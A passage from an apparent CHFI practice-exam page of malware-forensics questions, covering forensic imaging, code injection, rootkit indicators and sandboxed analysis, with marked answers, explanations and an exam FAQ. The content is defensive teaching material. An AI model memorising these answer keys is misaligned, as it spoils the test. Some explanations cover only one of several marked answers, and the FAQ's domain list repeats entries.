A. Create a bit-for-bit forensic image of the sample
   (A forensic copy preserves evidence and allows safe analysis.)
B. Execute the sample in a debugger on a production machine
C. Disassemble the binary using IDA Pro directly
D. Connect the sample to an isolated network to observe behavior

Why: Creating a bit-for-bit forensic image (option A) is the correct first step because it preserves the malware in an immutable, write-protected state, preventing any accidental execution or modification. This ensures the integrity of the evidence and allows the analyst to work with a safe copy without risking infection of the host system or network. In malware forensics, this aligns with the fundamental principle of maintaining a chain of custody and avoiding alteration of the original sample.
Q4 (medium)

During malware analysis, an investigator finds that a suspicious process is injecting code into a legitimate system process (e.g., explorer.exe). Which technique is being used?

A. API hooking
B. Process hollowing
C. Code injection
   (Code injection is the technique of inserting code into a running process.)
D. DLL injection

Why: Code injection is the correct answer because the scenario describes a process injecting arbitrary code into a legitimate system process like explorer.exe. This is the generic term for techniques where malicious code is written into the address space of another process and executed, often via Windows API calls such as WriteProcessMemory and CreateRemoteThread. The question explicitly states 'injecting code,' which directly maps to the broad category of code injection, not a specific subtype.
Q5 (hard)

Which TWO of the following are common indicators of a rootkit infection on a Windows system?

A. High CPU usage by svchost.exe
B. System calls returning inconsistent results
   (Rootkits hook system calls to return false information.)
C. Unexpected open ports on the firewall
D. Presence of unsigned kernel drivers
E. Hidden processes not visible in Task Manager
   (Rootkits hide processes from standard system tools.)

Why: Option B is correct because rootkits operate at the kernel level, intercepting system calls to hide their presence. When a system call (e.g., NtQuerySystemInformation) is invoked, the rootkit modifies the return data to exclude malicious processes or files, causing the results to be inconsistent with the actual system state. This is a classic symptom of a kernel-mode rootkit that has hooked the System Service Dispatch Table (SSDT).
Q6 (medium)

Which THREE of the following are best practices for conducting malware forensics in a safe and effective manner?

A. Use a dedicated forensic workstation that is not connected to any network
   (Prevents malware from spreading and ensures analysis integrity.)
B. Delete the malware sample after analysis to prevent accidental infection
C. Always create a cryptographic hash of the malware sample before analysis
   (Hashing verifies integrity and aids in identifying known samples.)
D. Use a virtual machine or sandbox for dynamic analysis
   (Isolates the malware to prevent damage to the host system.)
E. Run all analysis using the same tools and versions as the attacker

Why: Option A is correct because a dedicated forensic workstation that is not connected to any network prevents the malware from communicating with command-and-control (C2) servers, exfiltrating data, or spreading to other systems. This isolation ensures the integrity of the analysis environment and protects the broader infrastructure from accidental infection or data leakage.

Frequently asked questions

How many questions are on the CHFI exam?

The CHFI exam has 125 questions and must be completed in 240 minutes. The passing score is 700/1000.

What types of questions appear on the CHFI exam?

Scenario-based questions covering exam objectives with detailed answer explanations.

How are CHFI questions organised by domain?

The exam covers 13 domains: Computer Forensics Investigation Process, Computer Forensics Fundamentals and Process, Storage Forensics and File System Analysis, Incident Response and First Responder Skills, Computer Forensics Lab, Evidence Acquisition and Duplication, OS and Network Forensics, OS and File System Forensics, Application, Email and Cloud Forensics, Mobile and Malware Forensics, Network and Cloud Forensics, Database and Application Forensics, Malware Forensics. Questions are weighted by domain — higher-weight domains appear more on your actual exam.

Are these the actual CHFI exam questions?

No. These are original exam-style practice questions written against the official EC-Council CHFI exam objectives. They are not copied from the real exam. Courseiva focuses on genuine understanding, not memorisation of braindumps.